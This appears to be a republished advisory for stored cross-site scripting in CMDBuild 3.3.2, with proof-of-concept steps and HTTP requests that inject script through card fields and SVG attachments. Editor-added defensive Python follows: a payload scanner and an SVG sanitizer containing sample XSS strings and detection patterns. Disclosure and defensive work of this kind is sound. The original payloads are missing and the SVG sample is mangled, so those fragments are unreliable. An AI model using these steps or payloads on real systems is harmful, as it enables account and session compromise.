
Published on November 16th, 2021


CMDBuild 3.3.2 Cross Site Scripting – Torchsec



# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML, either through card field values that are later rendered unescaped (for example in the relation graph) or through a crafted SVG document uploaded as an attachment. The attack vectors include Add Attachment, Add Office, and Add Employee; almost all "Add" sections are affected.

Proofs of concept:

Stored XSS example (card fields):

1-Log in to your dashboard as a low-privilege user
2-Click on Basic archives, then Employee
3-Click +Add card Employee
4-Enter your XSS payload in the card fields (Code, Name and Surname in the request below)
5-On the added employee, click "Open Relation Graph": the stored field values are rendered without encoding and the payload executes

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"">","Description":null,"Surname":"">","Name":"">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
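As an added example (not part of the original advisory and not CMDBuild's own code), the Python below takes card records in the same shape as the PoC body above and flags string fields that carry markup or an attribute-breakout prefix such as `">`. It is the scan a defender would run over a card export after patching, to find payloads already stored in Code, Name or Surname, and it shows the HTML encoding the graph view should have applied before rendering. The `_id` field, the card ids and the `<img onerror>` payload are assumptions made for the sample; the advisory's own payload string is not shown on this page.

```python
import html
import json
import re

# Markup, attribute breakout, inline handlers or javascript: URLs have no place
# in a card field such as Code, Name or Surname. The `">` alternative matters
# because the PoC body above closes an attribute before injecting its tag.
# Hits are leads for review, not proof on their own.
_MARKUP = re.compile(
    r'<\s*/?\s*[a-zA-Z!]|"\s*>|\bon[a-z]+\s*=|javascript\s*:', re.IGNORECASE
)


def find_tainted_fields(card: dict) -> list:
    """Return (field, value) pairs whose string value looks like stored markup."""
    hits = []
    for field, value in card.items():
        if field.startswith("_"):  # _type, _tenant, _id are CMDBuild metadata
            continue
        if isinstance(value, str) and _MARKUP.search(value):
            hits.append((field, value))
    return hits


def scan_cards(cards: list) -> list:
    """Report every stored payload as (class, card id, field, value)."""
    findings = []
    for card in cards:
        for field, value in find_tainted_fields(card):
            findings.append((card.get("_type"), card.get("_id"), field, value))
    return findings


def escape_card(card: dict) -> dict:
    """HTML-encode string fields so a view that interpolates them into markup
    (the relation graph labels, for instance) renders text instead of tags."""
    return {
        k: (html.escape(v, quote=True) if isinstance(v, str) else v)
        for k, v in card.items()
    }


# Constructed sample: field layout copied from the PoC body, payload and
# `_id` values assumed for illustration.
PAYLOAD = '"><img src=x onerror=alert(document.domain)>'
SAMPLE_CARDS = [
    {"_type": "Employee", "_tenant": "", "_id": 271301, "Code": PAYLOAD,
     "Description": None, "Surname": PAYLOAD, "Name": PAYLOAD, "Email": None},
    {"_type": "Employee", "_tenant": "", "_id": 271302, "Code": "EMP-0042",
     "Description": "Jane Doe", "Surname": "Doe", "Name": "Jane",
     "Email": "jane@example.org"},
]

if __name__ == "__main__":
    for cls, card_id, field, value in scan_cards(SAMPLE_CARDS):
        print("stored payload: class=%s id=%s field=%s value=%r" % (cls, card_id, field, value))
    print(json.dumps(escape_card(SAMPLE_CARDS[0]), indent=1))
```

Run it against a JSON dump of `GET .../classes/<Class>/cards` for each class with an "Add" form; every finding is a record to clean or re-encode, and `escape_card` is the shape of the fix on the rendering side rather than a substitute for it.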

------------------------------------------------------------------------

File upload XSS example (SVG attachment):

1-Click on Basic archives
2-Click on Workplace, then +Add card Workplace
3-Select the "attachments" icon, then +Add attachment and choose an image
4-Upload your SVG file carrying the XSS payload
5-Click preview, then right-click and open it in a new tab: the stored SVG is opened as a document rather than downloaded, and its payload runs

Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
width="300"612px" height="400"502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">
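Added example, from the editor rather than from the advisory or from CMDBuild: a strict SVG sanitizer showing what the attachment path should do with a file like `kiwi.svg` before storing it, plus the response headers that keep an attachment from executing if a user opens it in a new tab as in step 5. The sample SVG is constructed here (the script, `onload` and `javascript:` parts are assumptions standing in for the advisory's payload), and `defusedxml` is mentioned as an assumed drop-in parser for production.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep <svg> unprefixed on output
ET.register_namespace("xlink", XLINK_NS)

# Elements that run script, embed HTML, or can rewrite an href at runtime.
# Dropping all SMIL animation is deliberately strict for an upload path.
DROP_ELEMENTS = {"script", "foreignobject", "set", "animate",
                 "animatetransform", "animatemotion"}
UNSAFE_SCHEMES = ("javascript:", "vbscript:", "data:")


def _local(name: str) -> str:
    """'{ns}href' -> 'href'; names are compared case-insensitively."""
    return name.rsplit("}", 1)[-1].lower()


def _unsafe_url(value: str) -> bool:
    # expat has already decoded entities, so &#106;avascript: arrives as
    # javascript:; embedded whitespace is removed before the scheme check.
    return "".join(value.split()).lower().startswith(UNSAFE_SCHEMES)


def sanitize_svg(svg_bytes: bytes):
    """Return (clean_svg, removed). removed lists what was stripped so the
    upload can be rejected or logged. For untrusted input in production parse
    with defusedxml.ElementTree.fromstring instead (assumed available): plain
    expat does not defend against entity-expansion or external-entity tricks."""
    root = ET.fromstring(svg_bytes)
    removed = []
    # Pass 1: drop dangerous elements (iterate over copies while mutating).
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in DROP_ELEMENTS:
                parent.remove(child)
                removed.append("element:" + _local(child.tag))
    # Pass 2: drop on* handlers and href/xlink:href with a script-capable scheme.
    for el in root.iter():
        for attr in list(el.attrib):
            name = _local(attr)
            if name.startswith("on"):                     # onload, onclick, ...
                removed.append("attr:" + name)
                del el.attrib[attr]
            elif name == "href" and _unsafe_url(el.attrib[attr]):
                removed.append("href:" + el.attrib[attr])
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode"), removed


def attachment_headers(filename: str) -> dict:
    """Headers for serving a stored attachment: force download instead of
    rendering, forbid MIME sniffing, and deny script if a browser still
    navigates to the file directly."""
    return {
        "Content-Disposition": 'attachment; filename="%s"' % filename.replace('"', ""),
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; script-src 'none'",
    }


# Constructed sample upload: same prolog and viewBox as the PoC file, with an
# assumed payload in three places (script element, onload handler, javascript: link).
SAMPLE_SVG = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="300" height="400" viewBox="0 65.326 612 502.174" onload="alert(document.domain)">
  <script type="text/javascript">alert(document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="100">click</text></a>
  <circle cx="100" cy="100" r="40" fill="green"/>
</svg>"""

if __name__ == "__main__":
    clean, removed = sanitize_svg(SAMPLE_SVG)
    print("removed:", removed)
    print(clean)
    print(attachment_headers("kiwi.svg"))
```

Sanitizing on upload and serving with these headers are independent controls; the headers alone already defeat the "open in new tab" step for attachments that were stored before the fix.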
